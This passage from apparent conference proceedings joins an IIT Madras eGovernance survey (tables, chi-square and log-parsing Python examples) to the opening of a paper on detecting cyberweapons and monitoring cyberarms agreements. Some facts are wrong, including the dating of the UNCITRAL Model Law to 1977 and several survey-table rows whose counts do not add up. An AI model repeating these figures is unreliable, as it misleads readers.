In this stage, governments provide more dynamic, specialized information that is distributed and regularly<br />
updated in a great number of government sites. Sometimes a national government’s official site serves<br />
as an entry point with links to pages of other branches of government, ministries, secretariats,<br />
departments, and sub-national administrative bodies. Some governments might start using electronic<br />
mail or search engines to interact with citizens, businesses and other stakeholders.<br />
Interactive Presence<br />
Governments use a state-wide or national portal as the initial page providing access to services in<br />
multiple agencies. The interaction between citizens and different government agencies increases in this<br />
stage (e.g., eMail, forums, etc.). Citizens and businesses can access information according to their<br />
different interests. In some cases, passwords are used to access more customized and secure services.<br />
Transactional Presence<br />
Citizens and businesses can personalize or customize a national or statewide portal. This portal becomes<br />
a unique showcase of all the governmental services available in the relevant area of interest. The needs<br />
of different constituencies are the main criteria for portal design and access (government structure and<br />
functions are only secondary criteria). The portal allows secure electronic payments to be made,<br />
facilitating transactions such as tax, fines, and services payments.<br />
Vertical Integration<br />
This stage encompasses the integration of similar services provided by different levels of government.<br />
This integration can be virtual, physical, or both. Therefore, this stage does not refer solely to an incipient<br />
integration in the form of government websites, but to the change and reconstruction of the processes<br />
and/or governmental structure.<br />
Horizontal Integration<br />
Horizontal integration between different governmental services must exist for citizens and other<br />
stakeholders to have access to all the potential of information technologies in government. Therefore, in<br />
this stage governments need to cross organizational boundaries and develop a comprehensive and<br />
integral vision of the government as a whole. Vertical and horizontal integration do not necessarily<br />
happen together or sequentially.<br />
Totally Integrated Presence<br />
This stage refers to the situation in which government services are fully integrated (vertically and<br />
horizontally). Citizens have access to a variety of services through a single portal, using a unique ID and<br />
password. All services can be accessed from the same web page and can be paid in a consolidated bill.<br />
A transformation unseen by the public has taken place, and now services are organized according to<br />
processes and constituencies, not only virtually, but also physically. In this stage, governments undertake<br />
institutional and administrative reforms that fully employ the potential of information technologies.<br />
4. Types of interactions in eGovernance<br />
eGovernance facilitates interaction between different stakeholders in governance.<br />
These interactions may be described as follows:<br />
G2G (Government to Government) – In this case, Information and Communications Technology is used<br />
not only to restructure the governmental processes involved in the functioning of government entities but<br />
also to increase the flow of information and services within and between different entities. This kind of<br />
interaction is only within the sphere of government and can be both horizontal, i.e. between different<br />
government agencies as well as between different functional areas within an organization, and vertical,<br />
i.e. between national, provincial and local government agencies as well as between different levels within<br />
an organization. The primary objective is to increase efficiency, performance and output.<br />
G2C (Government to Citizens) – In this case, an interface is created between the government and<br />
citizens which enables the citizens to benefit from efficient delivery of a large range of public services.<br />
This expands the availability and accessibility of public services on the one hand and improves the quality<br />
of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24<br />
hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended<br />
kiosk or from one’s home/workplace) and how to interact with the government (e.g. through internet, fax,<br />
telephone, email, face-to-face, etc.). The primary purpose is to make the government citizen-friendly.<br />
G2B (Government to Business) – G2B services include e-procurement, an online government-supplier exchange for the purchase of<br />
goods and services by government. Typically, e-procurement Web sites allow qualified and registered<br />
users to look for buyers or sellers of goods and services. Depending on the approach, buyers or sellers<br />
may specify prices or invite bids. E-procurement makes the bidding process transparent and enables<br />
smaller businesses to bid for big government procurement projects. The system also helps the<br />
government generate bigger savings, as costs from middlemen are shaved off and purchasing agents’<br />
overhead is reduced.<br />
G2E (Government to Employees) – Government is by far the biggest employer and, like any<br />
organisation, it has to interact with its employees on a regular basis. This interaction is a two-way process<br />
between the organisation and the employee. Use of ICT tools helps in making these interactions fast and<br />
efficient on the one hand and <strong>in</strong>crease satisfaction levels of employees on the other.<br />
5. Benefits of eGovernment
Provision of services: Electronic Service Delivery (ESD)
The most visible impact of eGovernment is seen in the extent to which eGovernment is identified with the provision of electronic services. Electronic Service Delivery (ESD) is beneficial to the citizens and other customers of the government in a variety of ways. The following benefits are discussed.
Better image: Speed, efficiency, transparency and convenience arising out of ESD enhance the image of government.
Cost cutting: eGovernment can result in significant cost reduction.
Better targeting of benefits: eGovernment projects in the social sectors, especially in the areas of welfare, health and education in the context of developing countries, bring in benefits arising out of better targeting of benefit schemes.
eGovernment benefits to citizens
Besides cost reduction, the other benefits to citizens are as follows:
Increased transparency leading to reduced corruption.
Better quality of life as a result of the use of e-services in areas such as health, education, employment, welfare and finance.
Easy access to information on government agencies and programmes.
Multiple delivery channels to choose from, thus adding to convenience and
Facilities like single-window and single-sign-on that remove the complexities of visiting multiple government agencies or web sites.
6. eGovernment and cyber law
Cyber law is the generic name given to the laws governing the acts that happen and exist in the intangible digital world. The cyber laws govern aspects such as giving a legal status to the intangible information that exists in cyberspace, the security and privacy of such information, the relationships and contracts between persons who exchange such information, their rights and responsibilities, crimes relating to damages caused to cyber information and digital assets, and all such matters related to the digital world. Citizens should be made aware of all the aspects of cyber crime, cyber security and cyber laws so that they are sure of their information security, and can protect themselves in the courts in case they are affected by cyber crimes.
Relevance of the 36 Stratagems (the art of war, written about 1000 years ago and used in ancient China) to present-day "Cyber Warfare". Cyber Warfare disrupts eGovernance services.
There are six chapters containing six stratagems each, totalling thirty-six stratagems. They are: 1. Winning Stratagems, 2. Enemy Dealing Stratagems, 3. Attacking Stratagems, 4. Chaos Stratagems, 5. Proximate Stratagems, 6. Defeat Stratagems.
Stratagem #3, "Killing with a borrowed knife", advises "Attack using the strength of another", which applies to the use of botnets as a means to launch DDoS (Distributed Denial of Service) attacks.
Stratagem #8, "Openly repair the gallery roads, but sneak through the passage of Chencang", means "Deceive the enemy with an obvious approach that will take a very long time", which applies to the use of "backdoors or Trojan worms when attacking a network".
Stratagem #10, "Hide the knife behind a smile", means "Charm and ingratiate yourself with your enemy until you have gained his trust. Then move against him.", which applies to "phishing schemes or other social engineering attacks".
Stratagem #30, "Send your enemy beautiful women", means "the honey trap", which applies to the use of "a honey pot, which lures visitors to a rigged site that collects information about them".
Cyber Law
The IT Act 2000 is the "Cyber Law" of India, which came into effect in October 2000. It has been enacted on the lines of the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law (UNCITRAL) in 1977. The Act defines terms such as e-form, e-Gazette, e-record, digital signature, digital signature certificate and key pair, which play pivotal roles in different areas of eGovernment and e-commerce.
Scope of the eGovernance study
While eGovernment encompasses a wide range of activities, this study concentrates on:
1. How effective the online facilities are, such as course information, forms downloading, institute circulars and announcements, the mess registration system, fees payment and the blood bank; and finding the responses about advantages like 24x7 access, time saving, transparency, user participation in decision making and avoiding paper work.
2. Introducing other areas into the eGovernance system, such as the medical history of patients in the IITM hospital, issue of passes for film club members, housing allocation and travel approval.
Objective
To determine the extent to which usage of the eGovernance system at IIT Madras is effective, to find the performance and user satisfaction, and to explore further avenues for eGovernance.
Methodology
The survey method is used, by providing questionnaires to the faculty, scholars, students and staff. The sample size of this study is 75, and convenience sampling is used. Data is encoded from the questionnaires for statistical analysis. Statistical tools like the Chi-Square test and frequency analysis were used by applying SPSS (Statistical Package for Social Sciences, version 15).
Analysis
Table 1: Frequency analysis of online facilities used in IITM
Facilities                Used (No. of respondents)  Percentage  Not used / not responded  Percentage
Online facilities         75                         100         0                         0
Course Information        67                         89          8                         11
Forms Downloading         58                         77          23                        23
Project Status            21                         28          54                        72
Online Course Development 21                         28          54                        72
Online Course Regn        41                         55          34                        45
Books Reservation         32                         43          43                        57
Books Issue               35                         47          40                        53
JEE/GATE-Centre           21                         28          54                        72
Estate Complaints         12                         16          63                        84
IITM Web Deve             21                         28          54                        72
Inst.Circ. & Anns.        50                         67          25                        33
Mess Registration         37                         49          38                        51
Blood Bank                6                          8           69                        92
Fees Payment              14                         19          61                        81
Faculty/Stud. Detail      61                         81          14                        19
Online Appln. Sub.        20                         27          55                        73
IITM Mast. Plan survey    10                         13          64                        85
ICSR Perf. Survey         8                          11          67                        89
Acad. Perf. Survey        5                          7           70                        93
CC Perf. Survey           6                          8           69                        92
Rate Contract             21                         28          54                        72
Salary Information        23                         31          52                        69
Using frequency analysis, the number of respondents who have used online facilities in IITM was calculated. It was found that one hundred percent of respondents have used online facilities. The number of respondents viewing faculty/staff/student details is the highest; next come those downloading forms, and next those viewing institute circulars and announcements. The numbers of respondents who access the blood bank facility and the Computer Centre performance survey are equal.
The graph in Figure 3 shows the respondents, who include faculty, staff, students and scholars, for the innovative features of online facilities at IITM. The most innovative feature is the Mess Registration and the next one is online courses.
Figure 2: Usage of online facilities at IITM
Figure 3: Innovative features of online facilities at IITM
The following table and figure depict that time saving is considered the most important advantage among all.
Table 2: Advantages of eGovernance as quoted by respondents
Advantages                              Number of respondents (yes)
24*7 Access                             61
Time Saving                             67
Transparency                            45
User Participation in decision making   33
Avoiding paper work                     64
Figure 4: Advantages of eGovernance as quoted by respondents
The Hospital-Patient-History item is the most preferred online facility to be introduced in the future, and the next items are the film club and travel approval.
Table 3: Suggestions for online facilities to be introduced in future
Areas of online facilities to be introduced   Number of respondents (yes)
Voting on Academic (BAR, BAC, DCC)            38
Agenda (BAR, BAC, DCC)                        27
Gymkhana issues                               34
Film Club                                     47
PCF Report                                    18
Pension plan statement                        23
Travel Approval                               45
House Allocation                              43
Hospital patient history                      64
Figure 5: Suggestions for online facilities to be introduced in future
BAR: Board of Academic Research, BAC: Board of Academic Courses, DCC: Department Consultative Committee, PCF: Personal Contingency Fund
Table 4: Innovative features by respondent role (the Chi-Square test is significant, implying that the preferred innovative feature differs by role)
Innovation                               Faculty  Staff  Scholar  Student  Total
Course Information                       1        1      5        2        9
Inst. Circulars & Announcements          2        1      2        0        5
Mess Registration System                 0        0      12       8        20
Blood Bank                               0        0      0        2        2
Faculty & Student details                2        1      0        2        5
Online Application submission            0        2      0        1        3
Computer Centre Performance              0        0      1        0        1
Details of rate contract                 0        5      0        0        5
Salary information                       0        2      0        0        2
Project / Fund status                    1        0      0        0        1
Online Course development                3        1      0        0        4
Online Course registration               0        0      0        4        4
Books reservation & Journal reference    0        0      4        0        4
Computerization of Catalogue (library)   0        1      3        3        7
JEE/GATE-Centre representative           3        0      0        0        3
Total                                    12       14     27       22       75
Among all innovative features, the mess registration system was the most innovative. The second one is Course Information.
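The Chi-Square test that the methodology applies with SPSS to Table 4, as an added example that is not the author's analysis: it recomputes the statistic from the table's own counts, without any statistics library, and also reports how many cells have an expected count below 5, the usual check on whether the chi-square approximation can be trusted. The critical value is the tabulated 0.95 quantile for 42 degrees of freedom (approximately 58.12).

```python
"""Chi-Square test of independence (role vs. most-innovative feature)
recomputed from Table 4. Added example, not the paper's SPSS output."""

ROLES = ["Faculty", "Staff", "Scholar", "Student"]

# Observed counts copied from Table 4 (rows: feature, columns: ROLES).
TABLE4 = {
    "Course Information": [1, 1, 5, 2],
    "Inst. Circulars & Announcements": [2, 1, 2, 0],
    "Mess Registration System": [0, 0, 12, 8],
    "Blood Bank": [0, 0, 0, 2],
    "Faculty & Student details": [2, 1, 0, 2],
    "Online Application submission": [0, 2, 0, 1],
    "Computer Centre Performance": [0, 0, 1, 0],
    "Details of rate contract": [0, 5, 0, 0],
    "Salary information": [0, 2, 0, 0],
    "Project / Fund status": [1, 0, 0, 0],
    "Online Course development": [3, 1, 0, 0],
    "Online Course registration": [0, 0, 0, 4],
    "Books reservation & Journal reference": [0, 0, 4, 0],
    "Computerization of Catalogue (library)": [0, 1, 3, 3],
    "JEE/GATE-Centre representative": [3, 0, 0, 0],
}

# Tabulated chi-square 0.95 quantile for 42 degrees of freedom (alpha = 0.05).
CHI2_CRIT_DF42_P05 = 58.12


def expected_counts(table):
    """Expected cell counts under independence: row_total * col_total / N."""
    rows = list(table.values())
    row_tot = [sum(r) for r in rows]
    col_tot = [sum(col) for col in zip(*rows)]
    n = sum(row_tot)
    return [[rt * ct / n for ct in col_tot] for rt in row_tot]


def chi_square_statistic(table):
    """Pearson chi-square statistic: sum over cells of (O - E)^2 / E."""
    rows = list(table.values())
    exp = expected_counts(table)
    return sum((o - e) ** 2 / e
               for orow, erow in zip(rows, exp)
               for o, e in zip(orow, erow))


def degrees_of_freedom(table):
    """(rows - 1) * (columns - 1); 14 * 3 = 42 for Table 4."""
    rows = list(table.values())
    return (len(rows) - 1) * (len(rows[0]) - 1)


def sparse_cells(table, threshold=5):
    """Cells whose expected count is below the threshold. The common rule of
    thumb allows at most 20% such cells; far more than that here, so the
    chi-square approximation to the sampling distribution is unreliable for
    a 75-respondent table this sparse, whatever the statistic says."""
    return sum(1 for erow in expected_counts(table) for e in erow if e < threshold)


def analyse(table):
    """Run the test and the validity check; returns a plain dict of results."""
    stat = chi_square_statistic(table)
    df = degrees_of_freedom(table)
    return {
        "statistic": stat,
        "df": df,
        # Only compare against the tabulated value if df matches it.
        "significant_at_0_05": (stat > CHI2_CRIT_DF42_P05) if df == 42 else None,
        "cells_below_5": sparse_cells(table),
        "total_cells": sum(len(r) for r in table.values()),
    }


if __name__ == "__main__":
    for key, value in analyse(TABLE4).items():
        print(f"{key}: {value}")
```

The statistic comes out near 112.8 on 42 degrees of freedom, which agrees with the paper's "significant" verdict, but 58 of the 60 cells have expected counts below 5.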
7. Summary of findings
One hundred percent of the respondents have used the online facilities.
In the online facilities category, online course registration, viewing faculty, student and staff information, viewing institute circulars and announcements, forms downloading and viewing salary information are preferred most by the respondents.
In the most innovative category, mess registration and online course registration were chosen as the most innovative items.
Time saving, avoiding paper work, 24x7 access and transparency were considered the main advantages of the eGovernance system.
Areas to be introduced in the future online system: the hospital (medical history of faculty, students and staff), travel approval and statement, film club issue of passes, voting on academic matters (BAR, BAC and DCC) and Gymkhana issue of passes were recommended by the respondents.
8. Conclusion
Apart from the above-mentioned findings, many respondents expressed their concern for the security of the information, both in transit through the internet and in the databases. It was felt by some respondents that the online facilities are not user friendly. Our system implements secured eGovernance services using cryptographic protocols and primitives.
Future work and suggestions: a survey on the effective utilization of "eGovernance Portals" using ICT (information and communication technology) infrastructure. I am planning to conduct a survey on how effectively the eGovernance information system is being used by the village people of Tamil Nadu. Due to the lack of computer facilities, people from villages could not access the web portal of the Tamil Nadu Government, in India. Therefore, I propose the new idea of collecting the data from the NIC (National Informatics Centre) centre server's log file, which contains the district-wise access of the people of Tamil Nadu. The process of collecting information from this log file, drawing the relevant graphs and web-enabling them can be automated by the "cron" process available on "Unix Operating System" web servers. Based on this information system, the government can concentrate more on the villages of the districts which have not benefited from the eGovernance system. The following figures depict the innovative ideas about the new method of data collection using ICTs. The two figures, Figure 6a and 6b, explain the future tasks: the district-wise data collection and the relevant graphs.
Figure 6a: Future plan to collect data and web enabling
Figure 6b: Future plan to collect data and web enabling
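The district-wise log collection proposed above, as an added example that is not the author's system: it parses constructed common-format web-server log lines, maps each client address to a district through a constructed address-block table (the real NIC log format and district address plan are not given in the paper), and separates served requests, error responses, distinct clients and unparseable lines so that a bad log line cannot silently distort the district figures.

```python
"""District-wise access report from a portal access log.
Added example; the log lines, address blocks and paths are constructed."""
import ipaddress
import re
from collections import Counter

# Constructed (hypothetical) mapping of client address blocks to districts.
DISTRICT_NETWORKS = {
    ipaddress.ip_network("10.1.0.0/16"): "Chennai",
    ipaddress.ip_network("10.2.0.0/16"): "Madurai",
    ipaddress.ip_network("10.3.0.0/16"): "Coimbatore",
}

# Common log format: client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log, including one deliberately malformed line.
SAMPLE_LOG = """\
10.1.4.7 - - [07/Jul/2011:09:15:02 +0530] "GET /portal/index.php HTTP/1.1" 200 5123
10.2.8.9 - - [07/Jul/2011:09:16:10 +0530] "GET /portal/forms/ration.pdf HTTP/1.1" 200 88123
10.1.4.7 - - [07/Jul/2011:09:17:44 +0530] "GET /portal/index.php HTTP/1.1" 304 0
10.3.1.2 - - [07/Jul/2011:09:18:01 +0530] "GET /portal/index.php HTTP/1.1" 500 0
192.0.2.55 - - [07/Jul/2011:09:19:20 +0530] "GET /portal/index.php HTTP/1.1" 200 5123
this line is not a log record
10.2.8.10 - - [07/Jul/2011:09:20:05 +0530] "POST /portal/grievance.php HTTP/1.1" 200 310
"""


def district_for(ip_text):
    """District of a client address by longest matching prefix, or None when
    the address is invalid or outside every known block."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    best = None
    for net, district in DISTRICT_NETWORKS.items():
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, district)
    return best[1] if best else None


def parse_log(text):
    """Parse records; malformed lines are counted rather than dropped silently."""
    records, malformed = [], 0
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            malformed += 1
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        records.append(rec)
    return records, malformed


def district_report(text):
    """Per-district served requests (status < 400), error responses and
    distinct client addresses, plus the number of unparseable lines."""
    served, errors, clients = Counter(), Counter(), {}
    records, malformed = parse_log(text)
    for rec in records:
        district = district_for(rec["ip"]) or "unmapped"
        if rec["status"] < 400:
            served[district] += 1
        else:
            errors[district] += 1
        clients.setdefault(district, set()).add(rec["ip"])
    unique = {d: len(s) for d, s in clients.items()}
    return {"served": served, "errors": errors,
            "clients": unique, "malformed": malformed}


def csv_rows(report):
    """CSV lines (header first) ready for graphing or publishing on the web."""
    rows = ["district,served,errors,clients"]
    for district in sorted(report["clients"]):
        rows.append(f"{district},{report['served'][district]},"
                    f"{report['errors'][district]},{report['clients'][district]}")
    return rows


# Hypothetical cron entry (paths are placeholders) to rebuild the report nightly:
# 0 1 * * * /usr/bin/python3 /opt/nic/district_report.py > /var/www/html/district.csv
if __name__ == "__main__":
    print("\n".join(csv_rows(district_report(SAMPLE_LOG))))
```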
Steps towards Monitoring Cyberarms Compliance
Neil Rowe (1), Simson Garfinkel (1), Robert Beverly (1), and Panayotis Yannakogeorgos (2)
(1) U.S. Naval Postgraduate School, Monterey, USA
(2) Air Force Research Institute, Maxwell AFB, USA
ncrowe at nps dot edu
slgarfin at nps dot edu
rbeverly at nps dot edu
yannakog1 at gmail dot com
Abstract: Cyberweapons are difficult weapons to control and police. Nonetheless, technology is becoming available that can help. We propose here the underlying technology necessary to support cyberarms agreements. Cyberweapon usage can be distinguished from other malicious Internet traffic in that cyberweapons are aimed precisely at targets which we can often predict in advance and can monitor. Unlike cybercrime, cyberweapon use will have political goals, and thus attackers will likely not try hard to conceal themselves. Furthermore, cyberweapons are temperamental weapons that depend on flaws in software, and flaws can get fixed. This means that cyberweapons testing will be seen before a serious attack. As well, we may be able to find evidence of cyberweapons on computers seized during or after hostilities, since cyberweapons have important differences from other software and are difficult to conceal on their development platforms. Recent advances in quick methods for assessing the contents of a disk drive can be used to rule out irrelevant data quickly. We also discuss methods for making cyberweapons more responsible by attribution and reversibility, and we discuss the kinds of international agreements we need to control them.
Keywords: cyberweapons, cyberattacks, agreements, monitoring, forensics, reversibility
1. Introduction
Cyberweapons are software that can be used to achieve military objectives by disabling computer systems, networks, or key functions of them. They can be malicious software installed secretly through concealed downloads or deliberate plants by human agents, or they can be attempts to overload online services. Cyberweapons are a growing component in military arsenals (Libicki 2007). Increasingly, countries are instituting "cyberattack corps" with capabilities to launch attacks in cyberspace on other countries as an instrument of war, either alone or combined with attacks by conventional military forces (Clarke and Knake 2010). Cyberattacks seem appealing to many military commanders in comparison to conventional arms. They seem to require fewer resources to mount since their delivery can be accomplished in small payloads such as malicious devices or packets. They also seem "cleaner" than conventional weapons in that their damage is primarily to data, and data can be repaired, although they are difficult to control and often perform actions close to perfidy, outlawed by the laws of war (Rowe 2010 JTE). Cyberweapons can be developed with modest technological infrastructure, even by underdeveloped countries (Gady 2010) taking advantage of international resources. So there is a particular threat of cyberattacks from "rogue states" such as North Korea and terrorist groups that hold extreme points of view.
Many of the information-security tools we use to control threats and vulnerabilities with the common criminal cyberattacks (Brenner 2010) will aid against the cyberweapon threat. Good software engineering practices, access controls, and system and network monitoring all help. But they are insufficient to stop cyberattacks today because of the increasing numbers of cyberattacks and the inherent weaknesses of these countermeasures. State-sponsored cyberattacks will be even harder to stop because they can exploit significant resources and could be more sophisticated than the attacks common today. They will likely employ a variety of methods simultaneously to have a high probability of success, and they can be tested thoroughly under a range of circumstances. Most current defensive measures will probably be useless against them.
2. Approach
What can be done against such threats? We believe that countries must negotiate international agreements similar to those for nuclear, chemical, and biological weapons. Such agreements (treaties, conventions, protocols, and memoranda of understanding) (Croft 1996) can dictate the ways in which cyberweapons can be used, for instance stipulating that countries agree to use cyberweapons only in defense against a cyberattack or in a serious crisis. Agreements can require action against hacker groups within a country as part of that country's internal policing, so that a nation cannot shift blame for cyberattacks and cyberweapons onto them. Very little has been done in proposing such agreements to date. It is time to plan out what such agreements will entail and how they should be enforced. The EastWest Institute in the U.S. recently proposed a cyberwar "Geneva Convention" (Rooney 2011).
(Johnson 2002) was skeptical in 2002 of the ability to implement cyberarms control, citing the difficulty of monitoring compliance. But the evolution of attacks since 2002 undermines many of his arguments. Cyberweapons are no longer a "cottage industry" but require significant infrastructure for finding exploits, finding targets, gaining access, managing the attacks, and concealing the attacks, and this infrastructure leaves traces. This is because target software, systems, and networks are becoming increasingly hardened and complex, and attacking them is becoming harder; and also because vulnerabilities are being found and fixed faster than ever. Also, digital forensics has advanced significantly since 2002, making it possible to determine all kinds of things from analysis of disk drives. Some technologies central to criminal cyberattacks today, like code obfuscation, have little legitimate use and are good indicators of cyberattack development, and we expect that the technologies used by cyberweapons will be similar.
Thus we think international agreements on cyberweapons are worth the effort even though finding cyberweapons and observing their use is hard. The situation is similar to that with chemical weapons, for which there are, for example, many methods for making mustard gas that can use common chemicals with legitimate uses. Although proving that a facility is used for chemical or biological weapons production is difficult, the type of equipment at a facility can give a good probability that it has been used to manufacture such weapons, as U.N. inspectors realized in Iraq in the 1990s when they discovered evidence of airlocks in alleged food-production facilities. International conventions banning chemical and biological weapons have been effective despite the difficulties of verifying production and stockpiling of such weapons (Price 1997). We think that similar examinations, and therefore conventions, should be possible in the cyberdomain. Even if developers of cyberweapons delete or hide evidence on their disks, there are many ways to retrieve it (Garfinkel 2006). We should start researching now how to perform effective cyberinspections.
We realize that policy is too often driven by crises, so it may take a serious cyberattack to interest a country in negotiating cyberarms limitations. Such a cyberattack is technically feasible (Clarke and Knake 2010) and could happen at any time. We need to be ready with proposals if it happens. In the meantime, progress can be made by the United Nations in negotiating broad cyberarms agreements. Such agreements could be helpful when rogue countries such as North Korea and terrorist organizations threaten the development of cyberwarfare capabilities and broad international cooperation is possible.
Two recent cases provide motivation. One is the cyberattacks on Georgia in August 2008 discussed in (Rowe 2010 ECIW). These were denial-of-service attacks against predominantly Georgian government Web sites. They were effective but there was collateral damage from the imprecision of the attack. Evidence suggests that private interests in Russia were responsible for the attacks (USCCU 2009). The other case is the "Stuxnet" worm and corresponding exploits targeting SCADA systems (Markoff 2010). These used traditional malware methods for modifying programs. Since Stuxnet targeted industrial systems with no associated financial incentive, it was clearly developed by an information-warfare group of a nation-state. It appears that Stuxnet was discovered because it spread well beyond its intended target. Nevertheless, in November 2010 it was reported that Stuxnet may have been successful in destroying multiple uranium processing centrifuges that are part of the Iranian nuclear effort.
3. Details
To achieve international agreements on cyberweapons, we see four issues: (1) locating them on computers; (2) noticing their use; (3) encouraging the more responsible kinds of cyberweapons; and (4) choosing appropriate types of agreements.
3.1 Analysis of drives to f<strong>in</strong>d cyberweapons<br />
The U.S. analyzed a number of captured computers and devices <strong>in</strong> its recent military operations <strong>in</strong> Iraq<br />
and Afghanistan. This was useful <strong>in</strong> identify<strong>in</strong>g <strong>in</strong>surgent networks and their <strong>in</strong>terconnections. Similarly,<br />
we believe that a good deal can be learned about a country's cyberweapons from the computers used to<br />
develop or deploy them. As part of a negotiated settlement of a conflict, a country may agree to forego<br />
cyberweapons, and may agree to submit to periodic <strong>in</strong>spections to confirm this (United Nations 1991).<br />
Detection of cyberweapons might seem difficult. But there are precedents <strong>in</strong> the detection of nuclear,<br />
chemical, and biological weapons (O'Neill 2010). Cyberweapons development generally requires<br />
222
Neil Rowe et al.<br />
unusual computer usage in secret facilities since most cyberweapons require secrecy to be effective, which rules out most software development facilities. Clues to cyberweapons can also be found inside computers. Certain types of software technology such as code obfuscation and spamming aids are good clues to malicious intent. Code for known attacks (for providing reuse opportunities) and stolen proprietary code such as Windows source code (for testing attacks) are other good clues. Technologies such as systematic code testers, "fuzzing" utilities, and code for remote control of other computers provide supporting evidence of cyberweapons development, though they have some legitimate uses. Data alone can be a clue, such as detailed reconnaissance information on adversary computer networks. Diversity of software techniques is a clue to cyberweapons development because the unreliability of cyberweapons requires the use of multiple methods as backup. Once suspected cyberweapons are found, they can be studied systematically to confirm their nature using malware analysis (Malin, Casey, and Aquilina 2008).<br />
A cyberweapon inspection regime would have to be performed on-site and with automated tools, as a party to a cybermonitoring regime would not allow a potential adversary to remove materials from a secret facility. Cyberweapon monitors would likely be required to use bootable CD-ROMs that would contain programs to analyze the contents of a computer system and look for evidence of cyberweapon development. Inspection would require a scheme for management of the necessary passwords and keys for the systems inspected, which could be aided by key escrow methods. Inspection regimes should also require "write-blockers" to assure that the monitors did not themselves plant cyberweapons on the systems being monitored. Other useful ideas from monitoring of nuclear capabilities (O'Neill 2010) include agreed inspector entry into the inspected country within a time limit, allowed banning of certain inspectors, designation of off-limits areas, and limits on what kind of evidence can be collected.<br />
A good prototype of what can be done in analysis of drives is our work on the Real Data Corpus, our collection of drive images (mostly disks) collected from around the world. Currently this collection includes more than 2000 disk images. Recent work has characterized disks and drives as a whole, including understanding of the type of user and the types of usage (Rowe and Garfinkel 2010). Clusters of files that have no counterpart in others in a corpus are particularly interesting, and can be the focus of more detailed forensic analysis. For faster assessment, random sampling of fragments taken from the middle of a file can accurately identify different types of data (Garfinkel et al. 2010). Tools for detecting deception markers are also useful since illegal cyberweapons development would need to be concealed. Deception could be in the form of deleted, renamed, or encrypted files, and could be enhanced by other techniques such as changing the system clock or manipulating a log file.<br />
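As an added illustration of the drive-analysis ideas above (files with no counterpart elsewhere in a corpus, fragment sampling from the middle of a file, and a renamed-file deception marker), the following Python is example code written for this page, not software from the Real Data Corpus project. The three-drive corpus, the entropy thresholds and the text-extension check are constructed assumptions.

```python
import hashlib
import math
import random
from collections import defaultdict

# Constructed three-drive corpus (not the Real Data Corpus): drive id -> {path: content}.
_rng = random.Random(2011)  # fixed seed so the sample corpus is reproducible


def _random_bytes(n):
    return bytes(_rng.getrandbits(8) for _ in range(n))


COMMON_OS_FILE = b"MZ" + b"\x00" * 2048                        # present on every drive
COMMON_TEXT = b"Meeting notes: discuss the quarterly report.\n" * 200
HIGH_ENTROPY_BLOB = _random_bytes(16384)                        # looks compressed or encrypted

CORPUS = {
    "drive_01": {"Windows/system.dll": COMMON_OS_FILE, "docs/notes.txt": COMMON_TEXT},
    "drive_02": {"Windows/system.dll": COMMON_OS_FILE, "docs/notes.txt": COMMON_TEXT},
    "drive_03": {"Windows/system.dll": COMMON_OS_FILE,
                 "work/build_artifact.bin": HIGH_ENTROPY_BLOB,   # no counterpart on other drives
                 "docs/readme.txt": HIGH_ENTROPY_BLOB[:4096]},   # named as text, but not text
}


def file_digest(data):
    """Content hash used to match files across drives regardless of path or name."""
    return hashlib.sha256(data).hexdigest()


def files_without_counterpart(corpus):
    """Return {drive_id: [paths]} for files whose content appears on exactly one drive.

    Files shared with other drives (OS components, common documents) are set aside;
    what remains is the cluster that deserves closer forensic attention.
    """
    drives_by_hash = defaultdict(set)
    locations_by_hash = defaultdict(list)
    for drive, files in corpus.items():
        for path, data in files.items():
            digest = file_digest(data)
            drives_by_hash[digest].add(drive)
            locations_by_hash[digest].append((drive, path))
    unique = defaultdict(list)
    for digest, drives in drives_by_hash.items():
        if len(drives) == 1:
            for drive, path in locations_by_hash[digest]:
                unique[drive].append(path)
    return {drive: sorted(paths) for drive, paths in unique.items()}


def middle_fragment(data, size=4096):
    """Take one fragment from the middle of the file, skipping headers and trailers."""
    if len(data) <= size:
        return data
    start = (len(data) - size) // 2
    return data[start:start + size]


def shannon_entropy(fragment):
    """Bits per byte of the fragment: 0 for a constant run, close to 8 for random bytes."""
    if not fragment:
        return 0.0
    counts = [0] * 256
    for b in fragment:
        counts[b] += 1
    n = len(fragment)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def classify_fragment(fragment):
    """Crude data-type label from entropy alone (an assumption of this example, not a
    full fragment classifier): high entropy suggests compressed or encrypted content."""
    h = shannon_entropy(fragment)
    if h >= 7.5:
        return "high-entropy"
    if h <= 5.5:
        return "low-entropy"
    return "mixed"


TEXT_EXTENSIONS = (".txt", ".csv", ".log")


def deception_markers(corpus):
    """Flag files whose name claims plain text but whose middle fragment is high-entropy,
    one of the renamed/encrypted-file markers mentioned in the text."""
    markers = []
    for drive, files in corpus.items():
        for path, data in files.items():
            if path.lower().endswith(TEXT_EXTENSIONS):
                if classify_fragment(middle_fragment(data)) == "high-entropy":
                    markers.append((drive, path))
    return sorted(markers)


if __name__ == "__main__":
    print("unique files:", files_without_counterpart(CORPUS))
    print("deception markers:", deception_markers(CORPUS))
```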
3.2 Network monitoring for cyberweapons<br />
There are many tools to discriminate legitimate from abusive network traffic. Such inferential intrusion detection has limitations due to the difficulty of defining malicious traffic in a sufficiently general way without incurring a large number of false positives (Trost 2010). But the attack landscape is different for politically and economically motivated state-sponsored cyberattacks:<br />
Targets: State-sponsored attacks will be targeted to particular regions and political agendas, in contrast to most criminals, who target victims indiscriminately.<br />
Sophistication: Cyberarms will be the product of well-funded nations with significant resources. Thus they will use new and sophisticated techniques rather than the common simpleminded attacks we see on the Internet. That may mean their initial stages may be hard to detect. However, as with all weapons, they must eventually produce a significant effect, and at that point their use will be obvious.<br />
Attribution: As with conventional warfare, the warring parties will likely follow specified (nondigital) protocols. Protocols will likely dictate that combatants reveal who they are at least in general terms.<br />
